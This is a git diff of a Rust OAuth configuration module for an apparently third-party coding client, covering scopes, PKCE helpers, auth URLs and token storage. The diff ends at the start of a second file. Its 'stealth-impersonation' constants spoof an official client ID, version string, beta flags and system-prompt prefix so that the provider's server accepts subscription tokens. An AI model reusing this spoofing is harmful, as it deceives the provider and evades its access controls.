client ID (stealth) - oauth_file_suffix: "-staging-oauth", - mcp_proxy_url: "https://mcp-proxy-staging.anthropic.com", - mcp_proxy_path: "/v1/mcp/{server_id}", -}; - -/// Client-ID Metadata Document URL for MCP OAuth (CIMD / SEP-991). -pub const MCP_CLIENT_METADATA_URL: &str = - "https://claude.ai/oauth/claude-code-client-metadata"; - -// --------------------------------------------------------------------------- -// Config selection -// --------------------------------------------------------------------------- - -/// Return the OAuth config appropriate for the current environment. -/// -/// Free-code always uses production OAuth. The `USER_TYPE=ant` gate and -/// staging variant have been removed for the OSS/free build. -pub fn get_oauth_config() -> &'static OAuthConfig { - &PROD_OAUTH -} - -// --------------------------------------------------------------------------- -// PKCE helpers (mirrors src/services/oauth/crypto.ts) -// --------------------------------------------------------------------------- - -/// PKCE code-challenge / code-verifier helpers. -pub mod pkce { - use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; - use sha2::{Digest, Sha256}; - - /// Generate a cryptographically random code verifier (43–128 chars of - /// Base64url characters, as required by RFC 7636). - /// - /// Uses `getrandom` via the `rand` crate's OS RNG through the `uuid` - /// crate's v4 generator — both already in-tree. Falls back to a - /// time+pid mix if the OS RNG is unavailable. - pub fn generate_code_verifier() -> String { - // 32 random bytes → 43-char Base64url string (same as the TS impl). - let bytes = random_bytes_32(); - URL_SAFE_NO_PAD.encode(bytes) - } - - /// Compute `BASE64URL(SHA256(verifier))` — the S256 code challenge. - pub fn code_challenge(verifier: &str) -> String { - let hash = Sha256::digest(verifier.as_bytes()); - URL_SAFE_NO_PAD.encode(hash) - } - - /// Generate a random state parameter (16 Base64url chars). - pub fn generate_state() -> String { - let bytes = random_bytes_32(); - let encoded = URL_SAFE_NO_PAD.encode(bytes); - // Take first 43 chars for a compact state parameter - encoded.chars().take(43).collect() - } - - // ------------------------------------------------------------------ - // Internal: produce 32 random bytes. - // We derive them from a UUID v4 (which already pulls from the OS RNG - // via the `uuid` crate) so we don't need to add a new `rand` dep. - // ------------------------------------------------------------------ - fn random_bytes_32() -> [u8; 32] { - // Two UUID v4 values give us 32 bytes of OS-backed randomness. - let u1 = uuid::Uuid::new_v4(); - let u2 = uuid::Uuid::new_v4(); - let mut out = [0u8; 32]; - out[..16].copy_from_slice(u1.as_bytes()); - out[16..].copy_from_slice(u2.as_bytes()); - out - } -} - -// --------------------------------------------------------------------------- -// Token and profile types -// --------------------------------------------------------------------------- - -/// Raw OAuth token response from the token endpoint. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TokenResponse { - pub access_token: String, - pub token_type: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub expires_in: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub refresh_token: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub scope: Option, -} - -/// Slim profile fetched after token exchange. -#[derive(Debug, Clone, Serialize, Deserialize, Default)] -pub struct OAuthProfile { - #[serde(skip_serializing_if = "Option::is_none")] - pub email: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub display_name: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub account_id: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub subscription_tier: Option, -} - -/// Fetch the OAuth profile using an access token. -/// -/// Returns a default (all-`None`) profile on any non-success response so -/// callers can treat a profile fetch failure as non-fatal. -pub async fn fetch_oauth_profile( - access_token: &str, - api_base: &str, -) -> anyhow::Result { - let client = reqwest::Client::new(); - let url = format!("{}/api/auth/oauth/profile", api_base.trim_end_matches('/')); - - let resp = client - .get(&url) - .bearer_auth(access_token) - .timeout(std::time::Duration::from_secs(10)) - .send() - .await?; - - if resp.status().is_success() { - let profile: OAuthProfile = resp.json().await.unwrap_or_default(); - Ok(profile) - } else { - // Non-fatal: return an empty profile so the caller can continue. - Ok(OAuthProfile::default()) - } -} - -// --------------------------------------------------------------------------- -// Auth URL builder -// --------------------------------------------------------------------------- - -/// Build the OAuth authorization URL (mirrors `buildAuthUrl` in client.ts). -pub fn build_auth_url( - code_challenge: &str, - state: &str, - port: u16, - is_manual: bool, - login_with_claude_ai: bool, - inference_only: bool, -) -> String { - let cfg = get_oauth_config(); - - let base = if login_with_claude_ai { - cfg.claude_ai_authorize_url - } else { - cfg.console_authorize_url - }; - - let redirect_uri = if is_manual { - cfg.manual_redirect_url.to_string() - } else { - format!("http://localhost:{}/callback", port) - }; - - let scopes: Vec<&str> = if inference_only { - vec![CLAUDE_AI_INFERENCE_SCOPE] - } else { - ALL_OAUTH_SCOPES.to_vec() - }; - - let scope_str = scopes.join(" "); - - format!( - "{}?code=true&client_id={}&response_type=code&redirect_uri={}&scope={}&code_challenge={}&code_challenge_method=S256&state={}", - base, - urlencoding::encode(cfg.client_id), - urlencoding::encode(&redirect_uri), - urlencoding::encode(&scope_str), - urlencoding::encode(code_challenge), - urlencoding::encode(state), - ) -} - -// --------------------------------------------------------------------------- -// Codex (OpenAI) OAuth Token Storage -// --------------------------------------------------------------------------- - -/// OpenAI Codex OAuth tokens, persisted to ~/.coven-code/codex_tokens.json -#[derive(Debug, Clone, Serialize, Deserialize, Default)] -pub struct CodexTokens { - pub access_token: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub refresh_token: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub account_id: Option, - /// Unix timestamp in seconds when the access token expires - #[serde(skip_serializing_if = "Option::is_none")] - pub expires_at: Option, -} - -/// Legacy single-file path: `~/.coven-code/codex_tokens.json`. Kept for -/// backward-compat reads when no account registry exists. -fn codex_tokens_path() -> Option { - dirs::home_dir().map(|h| h.join(".coven-code").join("codex_tokens.json")) -} - -/// Save Codex OAuth tokens for a named profile under -/// `~/.coven-code/accounts/codex//codex_tokens.json`. -pub fn save_codex_tokens_for_profile( - tokens: &CodexTokens, - profile_id: &str, -) -> anyhow::Result<()> { - let path = crate::accounts::codex_token_path(profile_id); - if let Some(parent) = path.parent() { - std::fs::create_dir_all(parent)?; - } - std::fs::write(&path, serde_json::to_string_pretty(tokens)?)?; - Ok(()) -} - -/// Load Codex OAuth tokens for a named profile. -pub fn load_codex_tokens_for_profile(profile_id: &str) -> Option { - let path = crate::accounts::codex_token_path(profile_id); - if !path.exists() { - return None; - } - let json = std::fs::read_to_string(&path).ok()?; - serde_json::from_str(&json).ok() -} - -/// Save Codex OAuth tokens, registering and activating a profile. Returns the -/// profile id. If a profile with a matching account_id already exists, reuses -/// it; otherwise derives an id from the JWT identity (or `label`, if given). -pub fn save_codex_tokens_and_register( - tokens: &CodexTokens, - label: Option<&str>, -) -> anyhow::Result { - use crate::accounts::{ - ensure_unique_profile_id, jwt_identity, slugify_profile_id, AccountProfile, - AccountRegistry, PROVIDER_CODEX, - }; - - let identity = jwt_identity(&tokens.access_token); - let mut registry = AccountRegistry::load(); - - let existing_id = registry - .list(PROVIDER_CODEX) - .into_iter() - .find(|p| { - (identity.email.is_some() && p.email == identity.email) - || (tokens.account_id.is_some() && p.account_id == tokens.account_id) - || (identity.account_id.is_some() - && p.account_id == identity.account_id) - }) - .map(|p| p.id); - - let id = if let Some(id) = existing_id { - id - } else if let Some(label) = label { - ensure_unique_profile_id(®istry, PROVIDER_CODEX, label) - } else { - let base = identity - .email - .as_deref() - .map(|e| e.split('@').next().unwrap_or(e).to_string()) - .or_else(|| tokens.account_id.clone()) - .or_else(|| identity.account_id.clone()) - .unwrap_or_else(|| "account".to_string()); - ensure_unique_profile_id(®istry, PROVIDER_CODEX, &base) - }; - - save_codex_tokens_for_profile(tokens, &id)?; - - let profile = AccountProfile { - id: id.clone(), - label: label.map(slugify_profile_id), - email: identity.email, - account_id: tokens - .account_id - .clone() - .or(identity.account_id), - organization_uuid: None, - subscription_tier: None, - added_at: None, - last_selected_at: None, - }; - registry.upsert(PROVIDER_CODEX, profile, true)?; - Ok(id) -} - -/// Save Codex tokens — back-compat shim. Writes to the active codex profile, -/// creating one if none exists. -pub fn save_codex_tokens(tokens: &CodexTokens) -> anyhow::Result<()> { - let registry = crate::accounts::AccountRegistry::load(); - if let Some(active) = registry.active(crate::accounts::PROVIDER_CODEX) { - save_codex_tokens_for_profile(tokens, active) - } else { - save_codex_tokens_and_register(tokens, None).map(|_| ()) - } -} - -/// Load the active Codex profile's tokens. Falls back to the legacy -/// single-file storage (auto-migrating on first read). -pub fn get_codex_tokens() -> Option { - let registry = crate::accounts::AccountRegistry::load(); - if let Some(active) = registry.active(crate::accounts::PROVIDER_CODEX) { - if let Some(t) = load_codex_tokens_for_profile(active) { - return Some(t); - } - } - // Legacy fallback + migration. - let legacy = codex_tokens_path()?; - if !legacy.exists() { - return None; - } - let json = std::fs::read_to_string(&legacy).ok()?; - let tokens: CodexTokens = serde_json::from_str(&json).ok()?; - if save_codex_tokens_and_register(&tokens, None).is_ok() { - let _ = std::fs::remove_file(&legacy); - } - Some(tokens) -} - -/// Clear tokens for the active Codex profile. Removes the profile from the -/// registry as well. -pub fn clear_codex_tokens() -> anyhow::Result<()> { - let mut registry = crate::accounts::AccountRegistry::load(); - if let Some(active) = registry - .active(crate::accounts::PROVIDER_CODEX) - .map(String::from) - { - registry.remove(crate::accounts::PROVIDER_CODEX, &active)?; - } - if let Some(legacy) = codex_tokens_path() { - if legacy.exists() { - std::fs::remove_file(&legacy)?; - } - } - Ok(()) -} - -/// Returns true if the user has a valid Codex access token. -/// Tokens are obtained via `/connect → OpenAI Codex` (browser OAuth flow) -/// or by setting `COVEN_CODE_USE_OPENAI=1` with a manually stored token. -pub fn is_codex_subscriber() -> bool { - get_codex_tokens() - .map(|t| !t.access_token.is_empty()) - .unwrap_or(false) -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_prod_config_urls_are_https() { - assert!(PROD_OAUTH.token_url.starts_with("https://")); - assert!(PROD_OAUTH.api_key_url.starts_with("https://")); - assert!(PROD_OAUTH.claude_ai_authorize_url.starts_with("https://")); - } - - #[test] - fn test_staging_config_urls_are_https() { - assert!(STAGING_OAUTH.token_url.starts_with("https://")); - assert!(STAGING_OAUTH.api_key_url.starts_with("https://")); - } - - #[test] - fn test_pkce_code_challenge_is_base64url() { - let verifier = pkce::generate_code_verifier(); - assert!(!verifier.is_empty()); - // Base64url characters only (no +, /, =) - assert!(!verifier.contains('+')); - assert!(!verifier.contains('/')); - assert!(!verifier.contains('=')); - - let challenge = pkce::code_challenge(&verifier); - assert!(!challenge.is_empty()); - assert!(!challenge.contains('+')); - assert!(!challenge.contains('/')); - assert!(!challenge.contains('=')); - } - - #[test] - fn test_verifier_length_meets_rfc7636_minimum() { - let verifier = pkce::generate_code_verifier(); - // RFC 7636 §4.1: code_verifier length ∈ [43, 128] - assert!( - verifier.len() >= 43, - "verifier too short: {} chars", - verifier.len() - ); - assert!(verifier.len() <= 128, "verifier too long: {} chars", verifier.len()); - } - - #[test] - fn test_all_oauth_scopes_contains_inference() { - assert!(ALL_OAUTH_SCOPES.contains(&CLAUDE_AI_INFERENCE_SCOPE)); - } - - #[test] - fn test_build_auth_url_contains_required_params() { - let url = build_auth_url("challenge123", "state456", 8080, false, true, false); - assert!(url.contains("challenge123")); - assert!(url.contains("state456")); - assert!(url.contains("S256")); - assert!(url.contains("localhost")); - } -} +//! OAuth configuration for multiple environments. +//! +//! This module mirrors the TypeScript `src/constants/oauth.ts` and +//! `src/services/oauth/crypto.ts` constants. It is intentionally +//! *configuration-only* — no live network I/O except for the optional +//! `fetch_oauth_profile` helper at the bottom. + +use serde::{Deserialize, Serialize}; + +// --------------------------------------------------------------------------- +// Scope constants (mirrors constants/oauth.ts) +// --------------------------------------------------------------------------- + +/// The Claude.ai inference scope — required for Bearer-auth API calls. +pub const CLAUDE_AI_INFERENCE_SCOPE: &str = "user:inference"; + +/// The profile scope — required to read account / subscription data. +pub const CLAUDE_AI_PROFILE_SCOPE: &str = "user:profile"; + +/// Console scope — used when creating an API key via the Console flow. +pub const CONSOLE_SCOPE: &str = "org:create_api_key"; + +/// All Claude.ai OAuth scopes (mirrors `CLAUDE_AI_OAUTH_SCOPES`). +pub const CLAUDE_AI_OAUTH_SCOPES: &[&str] = &[ + CLAUDE_AI_PROFILE_SCOPE, + CLAUDE_AI_INFERENCE_SCOPE, + "user:sessions:claude_code", + "user:mcp_servers", + "user:file_upload", +]; + +/// Console OAuth scopes (mirrors `CONSOLE_OAUTH_SCOPES`). +pub const CONSOLE_OAUTH_SCOPES: &[&str] = &[CONSOLE_SCOPE, CLAUDE_AI_PROFILE_SCOPE]; + +/// Union of all scopes used during login (mirrors `ALL_OAUTH_SCOPES`). +/// Requesting all at once lets a single login satisfy both Console and +/// claude.ai auth paths. +pub const ALL_OAUTH_SCOPES: &[&str] = &[ + CONSOLE_SCOPE, + CLAUDE_AI_PROFILE_SCOPE, + CLAUDE_AI_INFERENCE_SCOPE, + "user:sessions:claude_code", + "user:mcp_servers", + "user:file_upload", +]; + +/// Minimum scopes required for basic operation. +pub const MINIMUM_SCOPES: &[&str] = &[CLAUDE_AI_INFERENCE_SCOPE, CLAUDE_AI_PROFILE_SCOPE]; + +// --------------------------------------------------------------------------- +// Claude Code stealth-impersonation constants +// --------------------------------------------------------------------------- + +/// User-Agent advertised to Anthropic's API on OAuth-authenticated requests. +/// Must match a Claude Code version the server still accepts; bump when +/// Anthropic invalidates the current value. +pub const CLAUDE_CODE_VERSION_FOR_OAUTH: &str = "2.1.75"; + +/// `anthropic-beta` flags that must be present on every OAuth-authenticated +/// request. Without these the API server rejects subscription tokens. +pub const OAUTH_BETA_FLAGS: &[&str] = &["claude-code-20250219", "oauth-2025-04-20"]; + +/// System-prompt prefix that must appear as the first system block on every +/// OAuth-authenticated request. Anthropic's gate refuses requests whose system +/// prompt does not start with this identity string. +pub const CLAUDE_CODE_SYSTEM_PROMPT_PREFIX: &str = + "You are Claude Code, Anthropic's official CLI for Claude."; + +// --------------------------------------------------------------------------- +// OAuthConfig struct +// --------------------------------------------------------------------------- + +/// Full OAuth configuration for a deployment environment. +#[derive(Debug, Clone)] +pub struct OAuthConfig { + pub base_api_url: &'static str, + pub console_authorize_url: &'static str, + pub claude_ai_authorize_url: &'static str, + /// The raw claude.ai web origin (separate from the authorize URL which + /// may bounce through claude.com for attribution). + pub claude_ai_origin: &'static str, + pub token_url: &'static str, + pub api_key_url: &'static str, + pub roles_url: &'static str, + pub console_success_url: &'static str, + pub claudeai_success_url: &'static str, + pub manual_redirect_url: &'static str, + pub client_id: &'static str, + pub oauth_file_suffix: &'static str, + pub mcp_proxy_url: &'static str, + pub mcp_proxy_path: &'static str, +} + +// --------------------------------------------------------------------------- +// Production config (mirrors PROD_OAUTH_CONFIG in oauth.ts) +// --------------------------------------------------------------------------- + +// Claude Code OAuth client ID, used in stealth-impersonation mode so that +// Anthropic's auth server accepts Claude Pro/Max tokens through Coven Code. +// The matching request-time impersonation (user-agent, x-app, anthropic-beta, +// and the Claude Code system-prompt prefix) is wired up in +// `claurst_api::client::AnthropicClient` and is required for these tokens to +// be honoured by the API. +// +// Billing note: tokens minted by a Pro/Max subscription draw from the +// account's "extra usage" pool when used by a third-party client — they do +// not consume subscription quota. Users should be aware of this before +// switching from API-key auth. +pub const PROD_OAUTH: OAuthConfig = OAuthConfig { + base_api_url: "https://api.anthropic.com", + // Routes through claude.com/cai/* for attribution, 307s to claude.ai in + // two hops — same behaviour as the TypeScript client. + console_authorize_url: "https://platform.claude.com/oauth/authorize", + claude_ai_authorize_url: "https://claude.com/cai/oauth/authorize", + claude_ai_origin: "https://claude.ai", + token_url: "https://platform.claude.com/v1/oauth/token", + api_key_url: "https://api.anthropic.com/api/oauth/claude_cli/create_api_key", + roles_url: "https://api.anthropic.com/api/oauth/claude_cli/roles", + console_success_url: + "https://platform.claude.com/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code", + claudeai_success_url: "https://platform.claude.com/oauth/code/success?app=claude-code", + manual_redirect_url: "https://platform.claude.com/oauth/code/callback", + client_id: "9d1c250a-e61b-44d9-88ed-5944d1962f5e", // Claude Code client ID (stealth) + oauth_file_suffix: "", + mcp_proxy_url: "https://mcp-proxy.anthropic.com", + mcp_proxy_path: "/v1/mcp/{server_id}", +}; + +// --------------------------------------------------------------------------- +// Staging config (mirrors STAGING_OAUTH_CONFIG — ant builds only) +// --------------------------------------------------------------------------- + +pub const STAGING_OAUTH: OAuthConfig = OAuthConfig { + base_api_url: "https://api-staging.anthropic.com", + console_authorize_url: "https://platform.staging.ant.dev/oauth/authorize", + claude_ai_authorize_url: "https://claude-ai.staging.ant.dev/oauth/authorize", + claude_ai_origin: "https://claude-ai.staging.ant.dev", + token_url: "https://platform.staging.ant.dev/v1/oauth/token", + api_key_url: "https://api-staging.anthropic.com/api/oauth/claude_cli/create_api_key", + roles_url: "https://api-staging.anthropic.com/api/oauth/claude_cli/roles", + console_success_url: "https://platform.staging.ant.dev/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code", + claudeai_success_url: "https://platform.staging.ant.dev/oauth/code/success?app=claude-code", + manual_redirect_url: "https://platform.staging.ant.dev/oauth/code/callback", + client_id: "22422756-60c9-4084-8eb7-27705fd5cf9a", // Claude Code staging client ID (stealth) + oauth_file_suffix: "-staging-oauth", + mcp_proxy_url: "https://mcp-proxy-staging.anthropic.com", + mcp_proxy_path: "/v1/mcp/{server_id}", +}; + +/// Client-ID Metadata Document URL for MCP OAuth (CIMD / SEP-991). +pub const MCP_CLIENT_METADATA_URL: &str = "https://claude.ai/oauth/claude-code-client-metadata"; + +// --------------------------------------------------------------------------- +// Config selection +// --------------------------------------------------------------------------- + +/// Return the OAuth config appropriate for the current environment. +/// +/// Free-code always uses production OAuth. The `USER_TYPE=ant` gate and +/// staging variant have been removed for the OSS/free build. +pub fn get_oauth_config() -> &'static OAuthConfig { + &PROD_OAUTH +} + +// --------------------------------------------------------------------------- +// PKCE helpers (mirrors src/services/oauth/crypto.ts) +// --------------------------------------------------------------------------- + +/// PKCE code-challenge / code-verifier helpers. +pub mod pkce { + use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; + use sha2::{Digest, Sha256}; + + /// Generate a cryptographically random code verifier (43–128 chars of + /// Base64url characters, as required by RFC 7636). + /// + /// Uses `getrandom` via the `rand` crate's OS RNG through the `uuid` + /// crate's v4 generator — both already in-tree. Falls back to a + /// time+pid mix if the OS RNG is unavailable. + pub fn generate_code_verifier() -> String { + // 32 random bytes → 43-char Base64url string (same as the TS impl). + let bytes = random_bytes_32(); + URL_SAFE_NO_PAD.encode(bytes) + } + + /// Compute `BASE64URL(SHA256(verifier))` — the S256 code challenge. + pub fn code_challenge(verifier: &str) -> String { + let hash = Sha256::digest(verifier.as_bytes()); + URL_SAFE_NO_PAD.encode(hash) + } + + /// Generate a random state parameter (16 Base64url chars). + pub fn generate_state() -> String { + let bytes = random_bytes_32(); + let encoded = URL_SAFE_NO_PAD.encode(bytes); + // Take first 43 chars for a compact state parameter + encoded.chars().take(43).collect() + } + + // ------------------------------------------------------------------ + // Internal: produce 32 random bytes. + // We derive them from a UUID v4 (which already pulls from the OS RNG + // via the `uuid` crate) so we don't need to add a new `rand` dep. + // ------------------------------------------------------------------ + fn random_bytes_32() -> [u8; 32] { + // Two UUID v4 values give us 32 bytes of OS-backed randomness. + let u1 = uuid::Uuid::new_v4(); + let u2 = uuid::Uuid::new_v4(); + let mut out = [0u8; 32]; + out[..16].copy_from_slice(u1.as_bytes()); + out[16..].copy_from_slice(u2.as_bytes()); + out + } +} + +// --------------------------------------------------------------------------- +// Token and profile types +// --------------------------------------------------------------------------- + +/// Raw OAuth token response from the token endpoint. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TokenResponse { + pub access_token: String, + pub token_type: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub expires_in: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub refresh_token: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub scope: Option, +} + +/// Slim profile fetched after token exchange. +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct OAuthProfile { + #[serde(skip_serializing_if = "Option::is_none")] + pub email: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub display_name: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub account_id: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub subscription_tier: Option, +} + +/// Fetch the OAuth profile using an access token. +/// +/// Returns a default (all-`None`) profile on any non-success response so +/// callers can treat a profile fetch failure as non-fatal. +pub async fn fetch_oauth_profile( + access_token: &str, + api_base: &str, +) -> anyhow::Result { + let client = reqwest::Client::new(); + let url = format!("{}/api/auth/oauth/profile", api_base.trim_end_matches('/')); + + let resp = client + .get(&url) + .bearer_auth(access_token) + .timeout(std::time::Duration::from_secs(10)) + .send() + .await?; + + if resp.status().is_success() { + let profile: OAuthProfile = resp.json().await.unwrap_or_default(); + Ok(profile) + } else { + // Non-fatal: return an empty profile so the caller can continue. + Ok(OAuthProfile::default()) + } +} + +// --------------------------------------------------------------------------- +// Auth URL builder +// --------------------------------------------------------------------------- + +/// Build the OAuth authorization URL (mirrors `buildAuthUrl` in client.ts). +pub fn build_auth_url( + code_challenge: &str, + state: &str, + port: u16, + is_manual: bool, + login_with_claude_ai: bool, + inference_only: bool, +) -> String { + let cfg = get_oauth_config(); + + let base = if login_with_claude_ai { + cfg.claude_ai_authorize_url + } else { + cfg.console_authorize_url + }; + + let redirect_uri = if is_manual { + cfg.manual_redirect_url.to_string() + } else { + format!("http://localhost:{}/callback", port) + }; + + let scopes: Vec<&str> = if inference_only { + vec![CLAUDE_AI_INFERENCE_SCOPE] + } else { + ALL_OAUTH_SCOPES.to_vec() + }; + + let scope_str = scopes.join(" "); + + format!( + "{}?code=true&client_id={}&response_type=code&redirect_uri={}&scope={}&code_challenge={}&code_challenge_method=S256&state={}", + base, + urlencoding::encode(cfg.client_id), + urlencoding::encode(&redirect_uri), + urlencoding::encode(&scope_str), + urlencoding::encode(code_challenge), + urlencoding::encode(state), + ) +} + +// --------------------------------------------------------------------------- +// Codex (OpenAI) OAuth Token Storage +// --------------------------------------------------------------------------- + +/// OpenAI Codex OAuth tokens, persisted to ~/.coven-code/codex_tokens.json +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct CodexTokens { + pub access_token: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub refresh_token: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub account_id: Option, + /// Unix timestamp in seconds when the access token expires + #[serde(skip_serializing_if = "Option::is_none")] + pub expires_at: Option, +} + +/// Legacy single-file path: `~/.coven-code/codex_tokens.json`. Kept for +/// backward-compat reads when no account registry exists. +fn codex_tokens_path() -> Option { + dirs::home_dir().map(|h| h.join(".coven-code").join("codex_tokens.json")) +} + +/// Save Codex OAuth tokens for a named profile under +/// `~/.coven-code/accounts/codex//codex_tokens.json`. +pub fn save_codex_tokens_for_profile(tokens: &CodexTokens, profile_id: &str) -> anyhow::Result<()> { + let path = crate::accounts::codex_token_path(profile_id); + if let Some(parent) = path.parent() { + std::fs::create_dir_all(parent)?; + } + std::fs::write(&path, serde_json::to_string_pretty(tokens)?)?; + Ok(()) +} + +/// Load Codex OAuth tokens for a named profile. +pub fn load_codex_tokens_for_profile(profile_id: &str) -> Option { + let path = crate::accounts::codex_token_path(profile_id); + if !path.exists() { + return None; + } + let json = std::fs::read_to_string(&path).ok()?; + serde_json::from_str(&json).ok() +} + +/// Save Codex OAuth tokens, registering and activating a profile. Returns the +/// profile id. If a profile with a matching account_id already exists, reuses +/// it; otherwise derives an id from the JWT identity (or `label`, if given). +pub fn save_codex_tokens_and_register( + tokens: &CodexTokens, + label: Option<&str>, +) -> anyhow::Result { + use crate::accounts::{ + ensure_unique_profile_id, jwt_identity, slugify_profile_id, AccountProfile, + AccountRegistry, PROVIDER_CODEX, + }; + + let identity = jwt_identity(&tokens.access_token); + let mut registry = AccountRegistry::load(); + + let existing_id = registry + .list(PROVIDER_CODEX) + .into_iter() + .find(|p| { + (identity.email.is_some() && p.email == identity.email) + || (tokens.account_id.is_some() && p.account_id == tokens.account_id) + || (identity.account_id.is_some() && p.account_id == identity.account_id) + }) + .map(|p| p.id); + + let id = if let Some(id) = existing_id { + id + } else if let Some(label) = label { + ensure_unique_profile_id(®istry, PROVIDER_CODEX, label) + } else { + let base = identity + .email + .as_deref() + .map(|e| e.split('@').next().unwrap_or(e).to_string()) + .or_else(|| tokens.account_id.clone()) + .or_else(|| identity.account_id.clone()) + .unwrap_or_else(|| "account".to_string()); + ensure_unique_profile_id(®istry, PROVIDER_CODEX, &base) + }; + + save_codex_tokens_for_profile(tokens, &id)?; + + let profile = AccountProfile { + id: id.clone(), + label: label.map(slugify_profile_id), + email: identity.email, + account_id: tokens.account_id.clone().or(identity.account_id), + organization_uuid: None, + subscription_tier: None, + added_at: None, + last_selected_at: None, + }; + registry.upsert(PROVIDER_CODEX, profile, true)?; + Ok(id) +} + +/// Save Codex tokens — back-compat shim. Writes to the active codex profile, +/// creating one if none exists. +pub fn save_codex_tokens(tokens: &CodexTokens) -> anyhow::Result<()> { + let registry = crate::accounts::AccountRegistry::load(); + if let Some(active) = registry.active(crate::accounts::PROVIDER_CODEX) { + save_codex_tokens_for_profile(tokens, active) + } else { + save_codex_tokens_and_register(tokens, None).map(|_| ()) + } +} + +/// Load the active Codex profile's tokens. Falls back to the legacy +/// single-file storage (auto-migrating on first read). +pub fn get_codex_tokens() -> Option { + let registry = crate::accounts::AccountRegistry::load(); + if let Some(active) = registry.active(crate::accounts::PROVIDER_CODEX) { + if let Some(t) = load_codex_tokens_for_profile(active) { + return Some(t); + } + } + // Legacy fallback + migration. + let legacy = codex_tokens_path()?; + if !legacy.exists() { + return None; + } + let json = std::fs::read_to_string(&legacy).ok()?; + let tokens: CodexTokens = serde_json::from_str(&json).ok()?; + if save_codex_tokens_and_register(&tokens, None).is_ok() { + let _ = std::fs::remove_file(&legacy); + } + Some(tokens) +} + +/// Clear tokens for the active Codex profile. Removes the profile from the +/// registry as well. +pub fn clear_codex_tokens() -> anyhow::Result<()> { + let mut registry = crate::accounts::AccountRegistry::load(); + if let Some(active) = registry + .active(crate::accounts::PROVIDER_CODEX) + .map(String::from) + { + registry.remove(crate::accounts::PROVIDER_CODEX, &active)?; + } + if let Some(legacy) = codex_tokens_path() { + if legacy.exists() { + std::fs::remove_file(&legacy)?; + } + } + Ok(()) +} + +/// Returns true if the user has a valid Codex access token. +/// Tokens are obtained via `/connect → OpenAI Codex` (browser OAuth flow) +/// or by setting `COVEN_CODE_USE_OPENAI=1` with a manually stored token. +pub fn is_codex_subscriber() -> bool { + get_codex_tokens() + .map(|t| !t.access_token.is_empty()) + .unwrap_or(false) +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_prod_config_urls_are_https() { + assert!(PROD_OAUTH.token_url.starts_with("https://")); + assert!(PROD_OAUTH.api_key_url.starts_with("https://")); + assert!(PROD_OAUTH.claude_ai_authorize_url.starts_with("https://")); + } + + #[test] + fn test_staging_config_urls_are_https() { + assert!(STAGING_OAUTH.token_url.starts_with("https://")); + assert!(STAGING_OAUTH.api_key_url.starts_with("https://")); + } + + #[test] + fn test_pkce_code_challenge_is_base64url() { + let verifier = pkce::generate_code_verifier(); + assert!(!verifier.is_empty()); + // Base64url characters only (no +, /, =) + assert!(!verifier.contains('+')); + assert!(!verifier.contains('/')); + assert!(!verifier.contains('=')); + + let challenge = pkce::code_challenge(&verifier); + assert!(!challenge.is_empty()); + assert!(!challenge.contains('+')); + assert!(!challenge.contains('/')); + assert!(!challenge.contains('=')); + } + + #[test] + fn test_verifier_length_meets_rfc7636_minimum() { + let verifier = pkce::generate_code_verifier(); + // RFC 7636 §4.1: code_verifier length ∈ [43, 128] + assert!( + verifier.len() >= 43, + "verifier too short: {} chars", + verifier.len() + ); + assert!( + verifier.len() <= 128, + "verifier too long: {} chars", + verifier.len() + ); + } + + #[test] + fn test_all_oauth_scopes_contains_inference() { + assert!(ALL_OAUTH_SCOPES.contains(&CLAUDE_AI_INFERENCE_SCOPE)); + } + + #[test] + fn test_build_auth_url_contains_required_params() { + let url = build_auth_url("challenge123", "state456", 8080, false, true, false); + assert!(url.contains("challenge123")); + assert!(url.contains("state456")); + assert!(url.contains("S256")); + assert!(url.contains("localhost")); + } +} diff --git a/src-rust/crates/core/src/output_styles.rs b/src-rust/crates/core/src/output_styles.rs index 73ba5fa..f7d274a 100644 --- a/src-rust/crates/core/src/output_styles.rs +++ b/src-rust/crates/core/src/output_styles.rs @@ -1,406 +1,407 @@ -//! Output style system — customises how Claude responds to the user. -//! -//! Styles are applied by injecting `OutputStyleDef::prompt` into the system -//! prompt. Built-in styles are defined in code; users can add their own by -//! placing `.md` or `.json` files in: -//! - Global: `~/.coven-code/output-styles/` -//! - Project: `.coven-code/output-styles/` -//! -//! Markdown style files have a simple structure: -//! Line 1: `#